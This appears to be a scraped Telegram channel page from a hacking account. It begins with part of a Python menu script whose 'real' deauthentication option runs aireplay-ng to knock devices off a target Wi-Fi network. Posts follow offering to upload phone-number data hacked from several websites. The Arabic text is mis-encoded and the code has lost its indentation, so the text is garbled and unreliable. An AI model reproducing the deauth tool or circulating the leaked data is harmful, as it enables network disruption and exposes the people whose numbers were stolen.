target_channel = input(f"{Y}[?] ุงูููุงุฉ: {RS}")
print(f"{Y}[*] ุจุฏุก ุงููุฌูู ... ุงุถุบุท Ctrl+C ููุฅููุงู{RS}")
try:
subprocess.run(['sudo', 'aireplay-ng', '-0', '0', '-a', target_bssid, mon_interface])
except KeyboardInterrupt:
print(f"{G}[+] ุชู ุงูุฅููุงู{RS}")
subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")
def network_info_real():
print(f"{Y}[*] ู ุนููู ุงุช ุงูุดุจูุฉ:{RS}\n")
try:
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print(f"{C}ุงุณู ุงูุฌูุงุฒ: {RS}{hostname}")
print(f"{C}IP ุงูู ุญูู: {RS}{local_ip}")
print(f"{C}ูุธุงู ุงูุชุดุบูู: {RS}{platform.system()}")
except Exception as e:
print(f"{R}[-] ุฎุทุฃ: {e}{RS}")
def main():
if not check_root():
return
print_banner()
print(f"{R}[!] ุงุณุชุฎุฏู ูุง ููุท ุนูู ุดุจูุชู ุงูู ูุฒููุฉ{RS}\n")
while True:
print(f"""
{C}โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ุงููุงุฆู ุฉ ุงูุฑุฆูุณูุฉ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ [1] ู ุณุญ ุงูุดุจูุงุช ุงูู ุญูุทุฉ (ุญูููู) โ
โ [2] ูุฌูู Deauth - ูุตู ุฌูุงุฒ (ุญูููู) โ
โ [3] ู ุนููู ุงุช ุงูุดุจูุฉ (ุญูููู) โ
โ [q] ุฎุฑูุฌ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ{RS}
""")
choice = input(f"{Y}[?] ุงุฎุชุฑ: {RS}")
if choice == '1':
scan_networks_real()
elif choice == '2':
deauth_attack_real()
elif choice == '3':
network_info_real()
elif choice == 'q':
print(f"{G}[+] ู ุน ุงูุณูุงู ุฉ!{RS}")
break
else:
print(f"{R}[-] ุฎูุงุฑ ุบูุฑ ุตุญูุญ{RS}")
input(f"\n{C}[ENTER] ููู ุชุงุจุนุฉ...{RS}")
os.system('clear' if os.name == 'posix' else 'cls')
if name == "main":
try:
main()
except KeyboardInterrupt:
print(f"\n{R}[!] ุชู ุงูุฅููุงู{RS}")
sys.exit(0)
ูุฐุง ุงูู
@X0XjX
๐4โค1๐ฅฐ1
Forwarded from ๐ฆSHARK NET
'iistamieun anzil bayanat airqam mukhtaraqih min kam mawqie waeajab bas arqam wahwl ajyb aism wayaha ayha aleiraqiu sajaluu ainzaluu waihtafaluu ghayr dualih qwlwli wabishru๐
@X0XjX
ุชุฑุฏูู ุงูุฒู ุฏุงุชุง ุงุฑูุงู ู ุฎุชุฑูู ู ู ูู ู ููุน ูุฌุจุช ุจุณ ุงุฑูุงู ูุงุญูู ุงุฌูุจ ุงุณู ููุงูุง ุนุฑุงูู ุชุฑุฏูู ุงูุฒู ูุงุฐุง ุชุฑุฏูู ุบูุฑ ุฏููู ูููููู ูุจุดุฑู ุงู ุฏููู ุจูููู ุจุญุงูู ุงุฌูุจ ๐๐
@X0XjX
@X0XjX
ุชุฑุฏูู ุงูุฒู ุฏุงุชุง ุงุฑูุงู ู ุฎุชุฑูู ู ู ูู ู ููุน ูุฌุจุช ุจุณ ุงุฑูุงู ูุงุญูู ุงุฌูุจ ุงุณู ููุงูุง ุนุฑุงูู ุชุฑุฏูู ุงูุฒู ูุงุฐุง ุชุฑุฏูู ุบูุฑ ุฏููู ูููููู ูุจุดุฑู ุงู ุฏููู ุจูููู ุจุญุงูู ุงุฌูุจ ๐๐
@X0XjX
๐4โค1โ1๐1๐1